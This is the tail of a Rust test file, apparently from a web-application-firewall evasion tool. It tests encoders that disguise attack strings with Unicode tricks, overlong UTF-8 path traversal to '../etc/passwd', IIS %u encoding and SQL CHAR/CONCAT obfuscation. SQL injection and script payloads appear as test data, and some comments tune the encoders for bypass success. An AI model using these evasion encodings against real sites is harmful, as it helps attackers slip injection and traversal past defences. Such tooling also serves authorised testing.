1586        // '<' = 0x3C = 60, 's'=0x73=115, '>'=0x3E=62
1587        // First three chars use slots 0, 1, 2:
1588        let encoded = html_entity_variants("<s>");
1589        assert_eq!(encoded, "&#x3c;&#X73;&#62;");
1590    }
1591
1592    #[test]
1593    fn html_entity_variants_unicode_codepoint() {
1594        // emoji U+1F600 ('😀') — codepoint 128512 — exercises higher-bit chars
1595        let encoded = html_entity_variants("\u{1F600}");
1596        assert_eq!(encoded, "&#x1f600;");
1597    }
1598
1599    #[test]
1600    fn html_entity_variants_distinct_from_canonical() {
1601        // 4+ char payload MUST differ from canonical html_entity_encode
1602        // (canonical is always lowercase-x hex with semicolon)
1603        let canon = html_entity_encode("ABCD");
1604        let var = html_entity_variants("ABCD");
1605        assert_ne!(canon, var);
1606    }
1607
1608    #[test]
1609    fn html_entity_variants_deterministic() {
1610        // Same input → same output (no randomness; rotation is by index)
1611        assert_eq!(
1612            html_entity_variants("hello world"),
1613            html_entity_variants("hello world")
1614        );
1615    }
1616
1617    // ── math_bold_encode tests ─────────────────────────────────────────
1618
1619    #[test]
1620    fn math_bold_encode_uppercase() {
1621        assert_eq!(math_bold_encode("A"), "\u{1D400}"); // 𝐀
1622        assert_eq!(math_bold_encode("Z"), "\u{1D419}"); // 𝐙
1623    }
1624
1625    #[test]
1626    fn math_bold_encode_lowercase() {
1627        assert_eq!(math_bold_encode("a"), "\u{1D41A}"); // 𝐚
1628        assert_eq!(math_bold_encode("z"), "\u{1D433}"); // 𝐳
1629    }
1630
1631    #[test]
1632    fn math_bold_encode_digits() {
1633        assert_eq!(math_bold_encode("0"), "\u{1D7CE}"); // 𝟎
1634        assert_eq!(math_bold_encode("9"), "\u{1D7D7}"); // 𝟗
1635    }
1636
1637    #[test]
1638    fn math_bold_encode_sql_keyword() {
1639        // SELECT → 𝐒𝐄𝐋𝐄𝐂𝐓
1640        let encoded = math_bold_encode("SELECT");
1641        assert_eq!(encoded.chars().count(), 6);
1642        for ch in encoded.chars() {
1643            assert!(
1644                (0x1D400..=0x1D419).contains(&(ch as u32)),
1645                "expected math bold capital, got U+{:04X}",
1646                ch as u32
1647            );
1648        }
1649    }
1650
1651    #[test]
1652    fn math_bold_encode_preserves_punctuation() {
1653        // ' OR 1=1-- — only letters/digits transform; punctuation stays
1654        let encoded = math_bold_encode("' OR 1=1--");
1655        // ' space = = - - all unchanged
1656        assert!(encoded.starts_with('\''));
1657        assert!(encoded.contains('='));
1658        assert!(encoded.ends_with("--"));
1659    }
1660
1661    #[test]
1662    fn math_bold_encode_mixed_alphanumeric() {
1663        let encoded = math_bold_encode("Aa0");
1664        // A → 𝐀, a → 𝐚, 0 → 𝟎
1665        let chars: Vec<char> = encoded.chars().collect();
1666        assert_eq!(chars.len(), 3);
1667        assert_eq!(chars[0] as u32, 0x1D400);
1668        assert_eq!(chars[1] as u32, 0x1D41A);
1669        assert_eq!(chars[2] as u32, 0x1D7CE);
1670    }
1671
1672    #[test]
1673    fn math_bold_encode_distinct_from_fullwidth() {
1674        // Fullwidth uses U+FF00 block; math bold uses U+1D400 block
1675        // The same input must produce different bytes (proving they're not equivalent).
1676        assert_ne!(math_bold_encode("SELECT"), fullwidth_encode("SELECT"));
1677    }
1678
1679    #[test]
1680    fn math_bold_encode_empty() {
1681        assert_eq!(math_bold_encode(""), "");
1682    }
1683
1684    // ── math_italic / script / fraktur / double_struck tests ────────────
1685
1686    #[test]
1687    fn math_italic_encode_uppercase() {
1688        assert_eq!(math_italic_encode("A"), "\u{1D434}"); // 𝐴
1689        assert_eq!(math_italic_encode("Z"), "\u{1D44D}"); // 𝑍
1690    }
1691
1692    #[test]
1693    fn math_italic_encode_handles_h_hole() {
1694        // U+1D455 is reserved (the hole); we substitute U+210E.
1695        assert_eq!(math_italic_encode("h"), "\u{210E}");
1696    }
1697
1698    #[test]
1699    fn math_italic_encode_is_distinct_from_bold() {
1700        assert_ne!(math_italic_encode("SELECT"), math_bold_encode("SELECT"));
1701    }
1702
1703    #[test]
1704    fn math_script_encode_fills_all_holes() {
1705        // Every uppercase letter must map to SOMETHING (no panic, no
1706        // fall-through to ASCII).
1707        for c in 'A'..='Z' {
1708            let s: String = c.to_string();
1709            let enc = math_script_encode(&s);
1710            assert!(
1711                enc != s,
1712                "math_script_encode left {c} unchanged — hole not filled"
1713            );
1714        }
1715    }
1716
1717    #[test]
1718    fn math_fraktur_encode_fills_chizr_holes() {
1719        for c in &['C', 'H', 'I', 'R', 'Z'] {
1720            let s: String = c.to_string();
1721            assert!(
1722                math_fraktur_encode(&s) != s,
1723                "math_fraktur_encode left {c} unchanged"
1724            );
1725        }
1726    }
1727
1728    #[test]
1729    fn math_double_struck_encode_digits_distinct_from_bold() {
1730        // double-struck 0 = U+1D7D8 ≠ bold 0 = U+1D7CE
1731        assert_ne!(math_double_struck_encode("0"), math_bold_encode("0"));
1732    }
1733
1734    #[test]
1735    fn math_double_struck_encode_fills_letter_holes() {
1736        for c in &['C', 'H', 'N', 'P', 'Q', 'R', 'Z'] {
1737            let s: String = c.to_string();
1738            assert!(math_double_struck_encode(&s) != s);
1739        }
1740    }
1741
1742    #[test]
1743    fn letterlike_encode_select_payload_uses_letterlike_block() {
1744        let encoded = letterlike_encode("SELECT");
1745        // L → U+2112 SCRIPT CAPITAL L (the headline letterlike sub).
1746        assert!(encoded.contains('\u{2112}'));
1747        // S has no letterlike-block equivalent; falls back to circled
1748        // Latin (U+24CE).
1749        assert!(
1750            encoded
1751                .chars()
1752                .any(|c| c as u32 >= 0x24B6 && c as u32 <= 0x24E9)
1753        );
1754    }
1755
1756    #[test]
1757    fn letterlike_encode_preserves_non_letters() {
1758        assert_eq!(letterlike_encode(" ' = "), " ' = ");
1759    }
1760
1761    #[test]
1762    fn all_new_encoders_preserve_pure_punctuation() {
1763        // Pure punctuation — no letters, no digits — must round-trip
1764        // through every encoder unchanged. (Digits ARE transformed
1765        // by math_double_struck_encode, so we exclude them.)
1766        for f in [
1767            math_italic_encode,
1768            math_script_encode,
1769            math_fraktur_encode,
1770            math_double_struck_encode,
1771            letterlike_encode,
1772        ] {
1773            assert_eq!(f("' = -- /* */ ;"), "' = -- /* */ ;");
1774        }
1775    }
1776
1777    #[test]
1778    fn all_new_encoders_distinct_from_each_other() {
1779        let s = "SELECT";
1780        let bold = math_bold_encode(s);
1781        let italic = math_italic_encode(s);
1782        let script = math_script_encode(s);
1783        let fraktur = math_fraktur_encode(s);
1784        let dstruck = math_double_struck_encode(s);
1785        let letter = letterlike_encode(s);
1786        let outputs = [bold, italic, script, fraktur, dstruck, letter];
1787        let set: std::collections::BTreeSet<&String> = outputs.iter().collect();
1788        assert_eq!(
1789            set.len(),
1790            outputs.len(),
1791            "two encoders produced identical output"
1792        );
1793    }
1794
1795    // ── zero-width + combining-mark injection tests ────────────────────
1796
1797    #[test]
1798    fn zero_width_inject_adds_chars_between_letters() {
1799        let out = zero_width_inject("script", '\u{200B}');
1800        assert!(out.contains("scr\u{200B}ipt") || out.contains("s\u{200B}c"));
1801        // Length grows by N-1 codepoints (one between each pair).
1802        assert_eq!(out.chars().count(), 6 + 5);
1803    }
1804
1805    #[test]
1806    fn zero_width_inject_preserves_non_alnum() {
1807        // Insert only between alnum chars, not punctuation.
1808        let out = zero_width_inject("' OR '1'='1", '\u{200C}');
1809        // The lone `'` chars don't trigger insertion before them.
1810        assert!(!out.starts_with('\u{200C}'));
1811    }
1812
1813    #[test]
1814    fn zero_width_defaults_count_correct() {
1815        // Five-element cycle so rotation covers ZWSP/ZWNJ/ZWJ/BOM/CGJ.
1816        assert_eq!(ZERO_WIDTH_DEFAULTS.len(), 5);
1817    }
1818
1819    #[test]
1820    fn combining_mark_inject_only_after_letters() {
1821        let out = combining_mark_inject("a1b2", '\u{0308}');
1822        // 'a' + ̈ + '1' + 'b' + ̈ + '2' — digits don't get marks.
1823        assert_eq!(out, "a\u{0308}1b\u{0308}2");
1824    }
1825
1826    // ── script_homoglyph_encode tests ──────────────────────────────────
1827
1828    #[test]
1829    fn script_homoglyph_select_uses_cyrillic_letters() {
1830        let out = script_homoglyph_encode("SELECT");
1831        // S → Cyrillic (no Cyrillic S — falls through to itself OR
1832        // gets mapped to one of the upper substitutions). E → U+0415.
1833        assert!(out.contains('\u{0415}'));
1834        // T → U+0422
1835        assert!(out.contains('\u{0422}'));
1836        // Output is byte-distinct from input.
1837        assert_ne!(out, "SELECT");
1838    }
1839
1840    #[test]
1841    fn script_homoglyph_preserves_punctuation() {
1842        assert_eq!(script_homoglyph_encode("' = -- ;"), "' = -- ;");
1843    }
1844
1845    // ── turkish_i + sharp_s tests ──────────────────────────────────────
1846
1847    #[test]
1848    fn turkish_i_encode_replaces_only_i() {
1849        assert_eq!(turkish_i_encode("script"), "scr\u{0131}pt");
1850        assert_eq!(turkish_i_encode("INSERT"), "\u{0130}NSERT");
1851        // 'a', 'b' etc. unchanged.
1852        assert_eq!(turkish_i_encode("abcdefg"), "abcdefg");
1853    }
1854
1855    #[test]
1856    fn sharp_s_encode_replaces_only_s() {
1857        assert_eq!(sharp_s_encode("select"), "\u{00DF}elect");
1858        assert_eq!(sharp_s_encode("SELECT"), "\u{00DF}ELECT");
1859    }
1860
1861    // ── json_key_unicode_escape tests ──────────────────────────────────
1862
1863    #[test]
1864    fn json_key_escape_full_id_payload() {
1865        let s = json_key_unicode_escape("id", "1 OR 1=1--");
1866        // Each char of "id" becomes \uXXXX.
1867        assert!(s.contains("\\u0069")); // i
1868        assert!(s.contains("\\u0064")); // d
1869        // Value JSON-encoded.
1870        assert!(s.contains("1 OR 1=1--"));
1871    }
1872
1873    #[test]
1874    fn json_key_escape_round_trips_through_serde() {
1875        let s = json_key_unicode_escape("admin", "true");
1876        let parsed: serde_json::Value = serde_json::from_str(&s).expect("valid JSON");
1877        // After parsing, the key decodes back to "admin".
1878        assert!(parsed.get("admin").is_some(), "decoded key missing: {s}");
1879    }
1880
1881    #[test]
1882    fn json_key_escape_preserves_value_quotes() {
1883        let s = json_key_unicode_escape("k", "v\"q");
1884        // serde_json escapes the inner quote.
1885        assert!(s.contains("v\\\"q"));
1886    }
1887
1888    // ── overlong_utf8_path tests ───────────────────────────────────────
1889
1890    #[test]
1891    fn overlong_utf8_2byte_dot_slash_replaces() {
1892        assert_eq!(
1893            overlong_utf8_path("../etc/passwd", 2),
1894            "%c0%ae%c0%ae%c0%afetc%c0%afpasswd"
1895        );
1896    }
1897
1898    #[test]
1899    fn overlong_utf8_3byte_dot_slash() {
1900        let out = overlong_utf8_path("..", 3);
1901        assert_eq!(out, "%e0%80%ae%e0%80%ae");
1902    }
1903
1904    #[test]
1905    fn overlong_utf8_4byte_default() {
1906        let out = overlong_utf8_path(".", 4);
1907        assert_eq!(out, "%f0%80%80%ae");
1908    }
1909
1910    #[test]
1911    fn overlong_utf8_preserves_non_traversal_chars() {
1912        let out = overlong_utf8_path("../etc/passwd", 2);
1913        assert!(out.contains("etc"));
1914        assert!(out.contains("passwd"));
1915    }
1916
1917    #[test]
1918    fn overlong_utf8_handles_backslash() {
1919        assert_eq!(
1920            overlong_utf8_path("..\\windows", 2),
1921            "%c0%ae%c0%ae%c0%5cwindows"
1922        );
1923    }
1924
1925    // ── bidi_inject tests ──────────────────────────────────────────────
1926
1927    #[test]
1928    fn bidi_inject_wraps_with_rlo_and_pdf() {
1929        let out = bidi_inject("tceleS");
1930        assert!(out.starts_with('\u{202E}'));
1931        assert!(out.ends_with('\u{202C}'));
1932        // 1 RLO + 6 letters + 1 PDF.
1933        assert_eq!(out.chars().count(), 8);
1934    }
1935
1936    // ── sql_concat_split tests ─────────────────────────────────────────
1937
1938    #[test]
1939    fn sql_concat_split_admin() {
1940        assert_eq!(sql_concat_split("'admin'"), "CONCAT('a','d','m','i','n')");
1941    }
1942
1943    #[test]
1944    fn sql_concat_split_password() {
1945        assert_eq!(
1946            sql_concat_split("'password'"),
1947            "CONCAT('p','a','s','s','w','o','r','d')"
1948        );
1949    }
1950
1951    #[test]
1952    fn sql_concat_split_in_clause() {
1953        assert_eq!(
1954            sql_concat_split("WHERE u='admin'"),
1955            "WHERE u=CONCAT('a','d','m','i','n')"
1956        );
1957    }
1958
1959    #[test]
1960    fn sql_concat_split_no_quotes_passthrough() {
1961        // No single quotes → input unchanged
1962        assert_eq!(sql_concat_split("SELECT 1"), "SELECT 1");
1963    }
1964
1965    #[test]
1966    fn sql_concat_split_multiple_literals() {
1967        // Two separate strings get independent CONCAT calls
1968        assert_eq!(sql_concat_split("'a' OR 'b'"), "CONCAT('a') OR CONCAT('b')");
1969    }
1970
1971    #[test]
1972    fn sql_concat_split_empty_literal() {
1973        assert_eq!(sql_concat_split("''"), "CONCAT('')");
1974    }
1975
1976    #[test]
1977    fn sql_concat_split_unbalanced_quote_passthrough() {
1978        // Lone opening quote with no closer → output preserves it
1979        assert_eq!(sql_concat_split("'unclosed"), "'unclosed");
1980    }
1981
1982    #[test]
1983    fn sql_concat_split_preserves_non_quote_chars() {
1984        // SQL keywords, operators, whitespace all unchanged
1985        let payload = "1=1; SELECT 'x', 'y' FROM dual";
1986        let out = sql_concat_split(payload);
1987        assert!(out.contains("SELECT"));
1988        assert!(out.contains("FROM dual"));
1989        assert!(out.contains("CONCAT('x')"));
1990        assert!(out.contains("CONCAT('y')"));
1991    }
1992
1993    #[test]
1994    fn sql_concat_split_real_injection_payload() {
1995        // Classic UNION SELECT extraction
1996        let payload = "' UNION SELECT 'admin','password' FROM users--";
1997        let out = sql_concat_split(payload);
1998        // Outer ' is unbalanced; collects up to ' before admin then closes there.
1999        // The first CONCAT contains the OR/UNION/SELECT keywords as char args —
2000        // not a useful execution path, but it demonstrates the tamper is
2001        // applied uniformly. The point is: every single-quoted region becomes
2002        // CONCAT, so a downstream layer can compose this with other tampers.
2003        assert!(out.contains("CONCAT("));
2004        // Real payloads that benefit start the quote OPEN and close it
2005        // before the SQL keywords, e.g. "1' UNION SELECT 'admin'--" where
2006        // the embedded 'admin' is the bypass target.
2007    }
2008
2009    // ── sql_char_decompose tests ───────────────────────────────────────
2010
2011    #[test]
2012    fn sql_char_decompose_admin() {
2013        // 'a'=97 'd'=100 'm'=109 'i'=105 'n'=110
2014        assert_eq!(sql_char_decompose("'admin'"), "CHAR(97,100,109,105,110)");
2015    }
2016
2017    #[test]
2018    fn sql_char_decompose_password() {
2019        assert_eq!(
2020            sql_char_decompose("'password'"),
2021            "CHAR(112,97,115,115,119,111,114,100)"
2022        );
2023    }
2024
2025    #[test]
2026    fn sql_char_decompose_path_literal() {
2027        // '/etc/passwd' — every byte represented numerically
2028        // '/'=47 'e'=101 't'=116 'c'=99 '/'=47 'p'=112 'a'=97 's'=115 's'=115 'w'=119 'd'=100
2029        assert_eq!(
2030            sql_char_decompose("'/etc/passwd'"),
2031            "CHAR(47,101,116,99,47,112,97,115,115,119,100)"
2032        );
2033    }
2034
2035    #[test]
2036    fn sql_char_decompose_no_quotes_passthrough() {
2037        assert_eq!(sql_char_decompose("SELECT 1"), "SELECT 1");
2038    }
2039
2040    #[test]
2041    fn sql_char_decompose_empty_literal_preserves_empty_string() {
2042        // F60 regression: pre-fix `''` produced `CHAR()` which is
2043        // NULL in MySQL — breaking `pass='' OR 1=1` auth bypass
2044        // (`= NULL` is never TRUE). Post-fix the empty literal
2045        // round-trips unchanged.
2046        assert_eq!(sql_char_decompose("''"), "''");
2047        // Embedded in a longer payload too.
2048        assert_eq!(
2049            sql_char_decompose("WHERE pass='' OR 1=1"),
2050            "WHERE pass='' OR 1=1"
2051        );
2052    }
2053
2054    // sql_char_decompose_empty_literal_preserves_empty_string above
2055    // supersedes the pre-fix test that asserted CHAR() — kept as a
2056    // marker rather than re-asserting the buggy old contract.
2057
2058    #[test]
2059    fn sql_char_decompose_unbalanced_passthrough() {
2060        assert_eq!(sql_char_decompose("'unclosed"), "'unclosed");
2061    }
2062
2063    #[test]
2064    fn sql_char_decompose_multiple_literals() {
2065        // 'a'=97  'b'=98
2066        assert_eq!(sql_char_decompose("'a' OR 'b'"), "CHAR(97) OR CHAR(98)");
2067    }
2068
2069    #[test]
2070    fn sql_char_decompose_distinct_from_concat_split() {
2071        // CONCAT uses single-char strings; CHAR uses ints. Outputs differ.
2072        assert_ne!(sql_char_decompose("'admin'"), sql_concat_split("'admin'"));
2073    }
2074
2075    #[test]
2076    fn sql_char_decompose_real_injection() {
2077        let payload = "1 OR username='admin'--";
2078        let out = sql_char_decompose(payload);
2079        assert_eq!(out, "1 OR username=CHAR(97,100,109,105,110)--");
2080    }
2081
2082    // ── pg_chr_decompose tests ─────────────────────────────────────────
2083
2084    #[test]
2085    fn pg_chr_decompose_admin() {
2086        assert_eq!(
2087            pg_chr_decompose("'admin'"),
2088            "(CHR(97)||CHR(100)||CHR(109)||CHR(105)||CHR(110))"
2089        );
2090    }
2091
2092    #[test]
2093    fn pg_chr_decompose_empty_literal() {
2094        assert_eq!(pg_chr_decompose("''"), "('')");
2095    }
2096
2097    #[test]
2098    fn pg_chr_decompose_in_where_clause() {
2099        assert_eq!(pg_chr_decompose("WHERE u='a'"), "WHERE u=(CHR(97))");
2100    }
2101
2102    #[test]
2103    fn pg_chr_decompose_distinct_from_char_decompose() {
2104        // CHR() is unary + pipe-concat; CHAR() is variadic. Different shapes.
2105        assert_ne!(pg_chr_decompose("'admin'"), sql_char_decompose("'admin'"));
2106    }
2107
2108    #[test]
2109    fn pg_chr_decompose_unbalanced_passthrough() {
2110        assert_eq!(pg_chr_decompose("'unclosed"), "'unclosed");
2111    }
2112
2113    #[test]
2114    fn sql_concat_split_isolated_literal_keeps_other_tokens() {
2115        // From a real payload: id=1 AND username = 'admin' AND status = 1
2116        let payload = "id=1 AND username='admin' AND status=1";
2117        let out = sql_concat_split(payload);
2118        assert_eq!(
2119            out,
2120            "id=1 AND username=CONCAT('a','d','m','i','n') AND status=1"
2121        );
2122    }
2123
2124    #[test]
2125    fn unicode_encode_empty() {
2126        assert_eq!(unicode_encode(""), "");
2127    }
2128
2129    // ── Fullwidth encoding tests ───────────────────────────────────────
2130
2131    #[test]
2132    fn fullwidth_encode_sql_keywords() {
2133        let encoded = fullwidth_encode("SELECT");
2134        assert_eq!(encoded, "ＳＥＬＥＣＴ");
2135        // Every ASCII letter should be in fullwidth range
2136        for ch in encoded.chars() {
2137            assert!(
2138                ch as u32 >= 0xFF01,
2139                "expected fullwidth char, got {ch} (U+{:04X})",
2140                ch as u32
2141            );
2142        }
2143    }
2144
2145    #[test]
2146    fn fullwidth_encode_spaces() {
2147        let encoded = fullwidth_encode("A B");
2148        assert!(
2149            encoded.contains('\u{3000}'),
2150            "space should become ideographic space"
2151        );
2152    }
2153
2154    #[test]
2155    fn fullwidth_encode_preserves_non_ascii() {
2156        let encoded = fullwidth_encode("日本語");
2157        assert_eq!(encoded, "日本語", "non-ASCII should pass through unchanged");
2158    }
2159
2160    #[test]
2161    fn fullwidth_encode_operators() {
2162        let encoded = fullwidth_encode("1=1");
2163        assert_eq!(encoded, "１＝１");
2164    }
2165
2166    #[test]
2167    fn fullwidth_encode_sqli_payload() {
2168        let encoded = fullwidth_encode("' OR 1=1--");
2169        // Should contain fullwidth equivalents, not ASCII
2170        assert!(!encoded.contains("OR"), "should not contain ASCII 'OR'");
2171        assert!(encoded.contains("ＯＲ"), "should contain fullwidth 'ＯＲ'");
2172    }
2173
2174    #[test]
2175    fn fullwidth_encode_empty() {
2176        assert_eq!(fullwidth_encode(""), "");
2177    }
2178
2179    // ── Homoglyph encoding tests ───────────────────────────────────────
2180
2181    #[test]
2182    fn homoglyph_preserves_sql_string_delimiters() {
2183        // Regression for F56: pre-fix `'` was mapped to U+2019,
2184        // destroying the SQL context-break the payload depends on.
2185        // U+2019 is not a SQL string delimiter — the host query's
2186        // string literal never closes and the injection becomes
2187        // inert. Verify the delimiters survive verbatim.
2188        let encoded = homoglyph_encode("' OR '1'='1");
2189        // Single + double quotes pass through unchanged.
2190        assert!(
2191            encoded.contains('\''),
2192            "ASCII single quote MUST be preserved for SQL: {encoded}"
2193        );
2194        assert!(
2195            !encoded.contains('\u{2019}'),
2196            "U+2019 right-single-quote must NOT appear: {encoded}"
2197        );
2198        // But the equals sign (non-delimiter) still gets mutated —
2199        // proves the function isn't a complete no-op.
2200        assert!(
2201            encoded.contains('\u{FF1D}'),
2202            "equals sign should still mutate to fullwidth: {encoded}"
2203        );
2204    }
2205
2206    #[test]
2207    fn homoglyph_preserves_ascii_double_quote() {
2208        let encoded = homoglyph_encode(r#""admin" OR "1"="1""#);
2209        assert!(
2210            encoded.contains('"'),
2211            "ASCII double quote MUST be preserved: {encoded}"
2212        );
2213        assert!(
2214            !encoded.contains('\u{201D}'),
2215            "U+201D right-double-quote must NOT appear: {encoded}"
2216        );
2217    }
2218
2219    #[test]
2220    fn homoglyph_replaces_angle_brackets() {
2221        let encoded = homoglyph_encode("<script>");
2222        assert!(!encoded.contains('<'), "ASCII < should be replaced");
2223        assert!(!encoded.contains('>'), "ASCII > should be replaced");
2224        assert!(encoded.contains('\u{FF1C}'), "should contain fullwidth <");
2225        assert!(encoded.contains('\u{FF1E}'), "should contain fullwidth >");
2226    }
2227
2228    #[test]
2229    fn homoglyph_replaces_equals() {
2230        let encoded = homoglyph_encode("1=1");
2231        assert!(!encoded.contains('='), "ASCII = should be replaced");
2232        assert!(encoded.contains('\u{FF1D}'), "should contain fullwidth =");
2233    }
2234
2235    #[test]
2236    fn homoglyph_preserves_letters() {
2237        let encoded = homoglyph_encode("SELECT");
2238        assert_eq!(encoded, "SELECT", "letters should be preserved");
2239    }
2240
2241    #[test]
2242    fn homoglyph_encode_empty() {
2243        assert_eq!(homoglyph_encode(""), "");
2244    }
2245
2246    #[test]
2247    fn homoglyph_replaces_parens() {
2248        let encoded = homoglyph_encode("fn()");
2249        assert!(encoded.contains('\u{FF08}'), "should contain fullwidth (");
2250        assert!(encoded.contains('\u{FF09}'), "should contain fullwidth )");
2251    }
2252
2253    // ── Bug 2 regression: iis_unicode_encode non-BMP adversarial twins ──
2254    //
2255    // PRE-FIX BUG: the loop body cast `ch as u32` into a %uXXXX format
2256    // without checking whether `code > 0xFFFF`. For supplementary-plane
2257    // characters (U+10000 and above) this produced a 5-digit hex sequence
2258    // like `%u1F600`, which IIS's %u decoder rejects (its format is
2259    // strictly 4 hex digits). The bypass looked encoded but was actually
2260    // undecodable on any real IIS target — a silent bypass-rate killer.
2261    // Fixed: emit a UTF-16 surrogate pair `%uHIGH%uLOW` for non-BMP chars.
2262
2263    #[test]
2264    fn iis_unicode_encode_lowest_non_bmp_u10000() {
2265        // U+10000 is the very first supplementary-plane codepoint (LINEAR B
2266        // SYLLABLE B008 A). Pre-fix: emitted `%u10000` (5 hex digits —
2267        // invalid IIS format). Post-fix: must emit the surrogate pair
2268        // %uD800%uDC00 (high=0xD800, low=0xDC00 for U+10000).
2269        let ch = '\u{10000}'; // U+10000
2270        let encoded = iis_unicode_encode(&ch.to_string());
2271        assert_eq!(
2272            encoded, "%uD800%uDC00",
2273            "U+10000 (lowest non-BMP) must encode as surrogate pair %uD800%uDC00, \
2274             not the invalid %u10000"
2275        );
2276        // Anti-regression: no 5-digit %u sequence.
2277        for hex_run in encoded.split("%u").skip(1) {
2278            let hex_part: String = hex_run
2279                .chars()
2280                .take_while(|c| c.is_ascii_hexdigit())
2281                .collect();
2282            assert_eq!(
2283                hex_part.len(),
2284                4,
2285                "every %u sequence must be exactly 4 hex digits (IIS spec); \
2286                 got {hex_part:?} in {encoded:?}"
2287            );
2288        }
2289    }
2290
2291    #[test]
2292    fn iis_unicode_encode_high_cjk_supplement_u20000() {
2293        // U+20000 is the first codepoint in CJK Unified Ideographs Extension
2294        // B (𠀀). Pre-fix: emitted `%u20000` (5 hex digits — IIS rejects).
2295        // Post-fix: surrogate pair calculation:
2296        //   surrogate_base = 0x20000 - 0x10000 = 0x10000
2297        //   high = 0xD800 + (0x10000 >> 10) = 0xD800 + 0x40 = 0xD840
2298        //   low  = 0xDC00 + (0x10000 & 0x3FF) = 0xDC00 + 0x00 = 0xDC00
2299        let ch = '\u{20000}';
2300        let encoded = iis_unicode_encode(&ch.to_string());
2301        assert_eq!(
2302            encoded, "%uD840%uDC00",
2303            "U+20000 (CJK Supplement) must encode as %uD840%uDC00"
2304        );
2305        for hex_run in encoded.split("%u").skip(1) {
2306            let hex_part: String = hex_run
2307                .chars()
2308                .take_while(|c| c.is_ascii_hexdigit())
2309                .collect();
2310            assert_eq!(
2311                hex_part.len(),
2312                4,
2313                "each %u group must be 4 hex digits; got {hex_part:?}"
2314            );
2315        }
2316    }
2317
2318    // ── §1 SPEED regression pins: byte-slice lookahead in json_unicode_alnum
2319    // and json_unicode_full (replacing Vec<char> collect). These tests pin
2320    // the observable contract so a revert to Vec<char> (or a bad rewrite
2321    // that breaks the ASCII-byte-boundary assumption) is caught immediately.
2322
2323    #[test]
2324    fn json_unicode_alnum_idempotency_multi_pre_escaped() {
2325        // A payload with TWO pre-escaped sequences back-to-back. The
2326        // byte-slice lookahead must advance the iterator correctly for
2327        // each and not double-count the second `\u`.
2328        let p = "\\u0041\\u0042"; // Already-escaped A, B
2329        let once = json_unicode_alnum(p);
2330        let twice = json_unicode_alnum(&once);
2331        // Both passes: no change — the sequences are already `\uXXXX`.
2332        assert_eq!(once, p, "first pass on pre-escaped must be a no-op");
2333        assert_eq!(twice, p, "second pass must also be a no-op");
2334    }
2335
2336    #[test]
2337    fn json_unicode_alnum_incomplete_escape_not_skipped() {
2338        // `\u004` (5 chars total but only 3 hex digits after `u`) must NOT
2339        // be treated as a pre-escaped sequence — the 4th hex digit is absent.
2340        // The `\` gets escaped (it's not alnum), `u` and `0`, `0`, `4` are
2341        // alnum and each get their own `\uXXXX`. This confirms the lookahead
2342        // correctly requires exactly 4 hex digits.
2343        let out = json_unicode_alnum("\\u004");
2344        // `\` → not alnum → bare `\`; `u`,`0`,`0`,`4` → each `\uXXXX`.
2345        // Net: the string is NOT passed through as-is.
2346        assert_ne!(out, "\\u004", "incomplete escape must not be skipped");
2347    }
2348
2349    #[test]
2350    fn json_unicode_full_idempotency_multi_pre_escaped() {
2351        // Same as alnum variant but for json_unicode_full.
2352        let p = "\\u0041\\u0042";
2353        let once = json_unicode_full(p);
2354        let twice = json_unicode_full(&once);
2355        assert_eq!(once, p, "first pass: pre-escaped must survive");
2356        assert_eq!(twice, p, "second pass: still a no-op");
2357    }
2358
2359    #[test]
2360    fn json_unicode_full_escapes_non_alnum_too() {
2361        // json_unicode_full escapes EVERY char — verify a space (U+0020)
2362        // and apostrophe (U+0027) are escaped, unlike json_unicode_alnum
2363        // which leaves punctuation bare.
2364        let out = json_unicode_full("' '");
2365        assert!(out.contains("\\u0027"), "apostrophe must be escaped");
2366        assert!(out.contains("\\u0020"), "space must be escaped");
2367    }
2368
2369    #[test]
2370    fn overlong_utf8_path_speed_opt_preserves_passthrough_chars() {
2371        // §1 SPEED: the push-loop rewrite must leave non-special chars
2372        // unchanged. Mix of alphabetic, digit, and special chars.
2373        let out = overlong_utf8_path("admin/../secret.txt", 2);
2374        assert!(out.contains("admin"));
2375        assert!(out.contains("secret"));
2376        assert!(out.contains("txt"));
2377        assert!(!out.contains('.')); // dots replaced
2378        assert!(!out.contains('/')); // slashes replaced
2379    }
2380
2381    #[test]
2382    fn overlong_utf8_path_empty_input_empty_output() {
2383        assert_eq!(overlong_utf8_path("", 2), "");
2384    }
2385}
wafrift_encoding/encoding/unicode.rs

wafrift_encoding/encoding/
unicode.rs